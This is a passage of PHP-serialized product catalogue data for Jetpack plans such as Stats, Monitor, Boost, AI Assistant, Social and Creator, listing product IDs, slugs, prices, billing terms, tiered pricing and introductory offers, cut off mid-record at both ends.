s:12:\"product_name\";s:43:\"Jetpack Stats (Free non-commercial license)\";s:12:\"product_slug\";s:25:\"jetpack_stats_free_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack_stats_free_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:2:\"$0\";}s:25:\"jetpack_stats_pwyw_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2222;s:12:\"product_name\";s:20:\"Jetpack Stats (Paid)\";s:12:\"product_slug\";s:25:\"jetpack_stats_pwyw_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack_stats_pwyw_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";i:0;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:2:\"$0\";}s:23:\"jetpack_stats_bi_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2223;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:23:\"jetpack_stats_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$160.00\";s:21:\"combined_cost_display\";s:4:\"$160\";s:4:\"cost\";i:160;s:18:\"cost_smallest_unit\";i:16000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:6:{i:0;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";i:10000;s:13:\"minimum_price\";i:16000;s:13:\"maximum_price\";i:16000;s:21:\"minimum_price_display\";s:4:\"$160\";s:29:\"minimum_price_monthly_display\";s:6:\"$13.34\";s:21:\"maximum_price_display\";s:4:\"$160\";s:29:\"maximum_price_monthly_display\";s:6:\"$13.34\";}i:1;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:10001;s:13:\"maximum_units\";i:100000;s:13:\"minimum_price\";i:32000;s:13:\"maximum_price\";i:32000;s:21:\"minimum_price_display\";s:4:\"$320\";s:29:\"minimum_price_monthly_display\";s:6:\"$26.67\";s:21:\"maximum_price_display\";s:4:\"$320\";s:29:\"maximum_price_monthly_display\";s:6:\"$26.67\";}i:2;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:100001;s:13:\"maximum_units\";i:250000;s:13:\"minimum_price\";i:48000;s:13:\"maximum_price\";i:48000;s:21:\"minimum_price_display\";s:4:\"$480\";s:29:\"minimum_price_monthly_display\";s:3:\"$40\";s:21:\"maximum_price_display\";s:4:\"$480\";s:29:\"maximum_price_monthly_display\";s:3:\"$40\";}i:3;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:250001;s:13:\"maximum_units\";i:500000;s:13:\"minimum_price\";i:80000;s:13:\"maximum_price\";i:80000;s:21:\"minimum_price_display\";s:4:\"$800\";s:29:\"minimum_price_monthly_display\";s:6:\"$66.67\";s:21:\"maximum_price_display\";s:4:\"$800\";s:29:\"maximum_price_monthly_display\";s:6:\"$66.67\";}i:4;O:8:\"stdClass\":8:{s:13:\"minimum_units\";i:500001;s:13:\"maximum_units\";i:1000000;s:13:\"minimum_price\";i:112000;s:13:\"maximum_price\";i:112000;s:21:\"minimum_price_display\";s:6:\"$1,120\";s:29:\"minimum_price_monthly_display\";s:6:\"$93.34\";s:21:\"maximum_price_display\";s:6:\"$1,120\";s:29:\"maximum_price_monthly_display\";s:6:\"$93.34\";}i:5;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:1000001;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:152000;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:1000000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:72000;s:12:\"per_unit_fee\";i:40000;s:21:\"minimum_price_display\";s:6:\"$1,520\";s:29:\"minimum_price_monthly_display\";s:7:\"$126.67\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:10000;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$6.67\";}s:23:\"jetpack_monitor_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2241;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:23:\"jetpack_monitor_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-monitor\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$1.22\";s:21:\"combined_cost_display\";s:5:\"$1.22\";s:4:\"cost\";d:1.2199999999999999733546474089962430298328399658203125;s:18:\"cost_smallest_unit\";i:122;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_monitor_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2242;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:22:\"jetpack_monitor_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-monitor\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.64\";s:21:\"combined_cost_display\";s:6:\"$14.64\";s:4:\"cost\";d:14.6400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:1464;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$1.22\";}s:21:\"jetpack_boost_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2400;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:21:\"jetpack_boost_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_boost_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2401;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:20:\"jetpack_boost_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:18:\"jetpack_ai_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2450;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:18:\"jetpack_ai_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_ai_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2451;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:17:\"jetpack_ai_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:20:\"jetpack_ai_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2452;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:20:\"jetpack_ai_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:22:\"jetpack_social_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2500;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:22:\"jetpack_social_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-social\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:3:\"$12\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_social_basic_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2503;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:27:\"jetpack_social_basic_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:28:\"jetpack_social_basic_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2504;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:28:\"jetpack_social_basic_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"jetpack_social_advanced_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2602;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:30:\"jetpack_social_advanced_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:31:\"jetpack_social_advanced_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2603;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:31:\"jetpack_social_advanced_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:33:\"jetpack_social_advanced_bi_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2604;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:33:\"jetpack_social_advanced_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$238.80\";s:21:\"combined_cost_display\";s:7:\"$238.80\";s:4:\"cost\";d:238.80000000000001136868377216160297393798828125;s:18:\"cost_smallest_unit\";i:23880;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:24:\"jetpack_social_v1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2605;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:24:\"jetpack_social_v1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-social-v1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_social_v1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2606;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:25:\"jetpack_social_v1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-social-v1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_social_v1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2607;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:27:\"jetpack_social_v1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-social-v1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:23:\"jetpack_creator_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2610;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:23:\"jetpack_creator_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-creator\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_creator_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2611;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:22:\"jetpack_creator_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-creator\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:25:\"jetpack_creator_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2612;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:25:\"jetpack_creator_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-creator\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:29:\"jetpack_golden_token_lifetime\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2900;s:12:\"product_name\";s:20:\"Jetpack Golden Token\";s:12:\"product_slug\";s:29:\"jetpack_golden_token_lifetime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:20:\"jetpack-golden-token\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jetpack_complete_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3302;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:27:\"a4a_jetpack_complete_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jetpack_complete_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.40\";s:21:\"combined_cost_display\";s:7:\"$299.40\";s:4:\"cost\";d:299.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:29940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$24.95\";}s:28:\"a4a_jetpack_complete_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3303;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:28:\"a4a_jetpack_complete_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jetpack_complete_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$24.95\";s:21:\"combined_cost_display\";s:6:\"$24.95\";s:4:\"cost\";d:24.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"a4a_jetpack_security_t1_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3304;s:12:\"product_name\";s:23:\"Jetpack Security 